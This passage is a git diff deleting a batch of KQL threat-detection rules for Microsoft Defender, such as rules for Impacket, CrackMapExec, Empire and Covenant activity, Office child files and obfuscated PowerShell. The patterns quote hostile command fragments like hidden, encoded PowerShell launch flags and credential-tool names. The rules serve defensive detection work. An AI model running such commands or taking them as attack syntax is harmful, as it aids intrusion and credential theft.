".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine 
endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'")))
\ No newline at end of file
diff --git a/Execution/File_Encryption_Using_Gpg4win.kql b/Execution/File_Encryption_Using_Gpg4win.kql
deleted file mode 100644
index b2f433f3..00000000
--- a/Execution/File_Encryption_Using_Gpg4win.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/09
-// Level: medium
-// Description: Detects usage of Gpg4win to encrypt files
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql b/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql
deleted file mode 100644
index 2f85709f..00000000
--- a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the creation of files with an executable or script extension by an Office application.
-// Tags: attack.t1204.002, attack.execution
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not(((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/Execution/Forfiles_Command_Execution.kql b/Execution/Forfiles_Command_Execution.kql
deleted file mode 100644
index 1805c4a9..00000000
--- a/Execution/Forfiles_Command_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022/06/14
-// Level: medium
-// Description: Detects the execution of "forfiles" with the "/c" flag.
-While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
-Can be used to bypass application whitelisting.
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql b/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
deleted file mode 100644
index 5a0c3e9b..00000000
--- a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/03/02
-// Level: medium
-// Description: A symbolic link is a type of file that contains a reference to another file.
-This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql b/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
deleted file mode 100644
index 030862ee..00000000
--- a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: high
-// Description: Detects any GAC DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql b/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution.kql b/Execution/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql b/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
deleted file mode 100644
index 9f4071c7..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: Detects various execution patterns of the CrackMapExec pentesting framework
-// Tags: attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql b/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
deleted file mode 100644
index b509eb86..00000000
--- a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/04/20
-// Level: high
-// Description: Detects suspicious powershell command line parameters used in Empire
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/Execution/HackTool_-_Impacket_Tools_Execution.kql b/Execution/HackTool_-_Impacket_Tools_Execution.kql
deleted file mode 100644
index dd80528d..00000000
--- a/Execution/HackTool_-_Impacket_Tools_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: high
-// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql b/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
deleted file mode 100644
index 9f71a8e1..00000000
--- a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/24
-// Level: medium
-// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Koadic_Execution.kql b/Execution/HackTool_-_Koadic_Execution.kql
deleted file mode 100644
index 48fb0d16..00000000
--- a/Execution/HackTool_-_Koadic_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: wagga, Jonhnathan Ribeiro, oscd.community
-// Date: 2020/01/12
-// Level: high
-// Description: Detects command line parameters used by Koadic hack tool
-// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql b/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
deleted file mode 100644
index 222c3f7c..00000000
--- a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/08/25
-// Level: critical
-// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Stracciatella_Execution.kql b/Execution/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Execution/HackTool_-_Stracciatella_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_WinPwn_Execution.kql b/Execution/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Execution/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 2a00e9b4..00000000
--- a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql b/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
deleted file mode 100644
index e96c12e8..00000000
--- a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/06
-// Level: medium
-// Description: Detects events that appear when a user click on a link file with a powershell command in it
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql b/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
deleted file mode 100644
index a95b8202..00000000
--- a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/10
-// Level: medium
-// Description: Detects powershell scripts that import modules from suspicious directories
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Execution/Insecure_Transfer_Via_Curl.EXE.kql b/Execution/Insecure_Transfer_Via_Curl.EXE.kql
deleted file mode 100644
index c4a97253..00000000
--- a/Execution/Insecure_Transfer_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "--insecure" flag.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql b/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql b/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
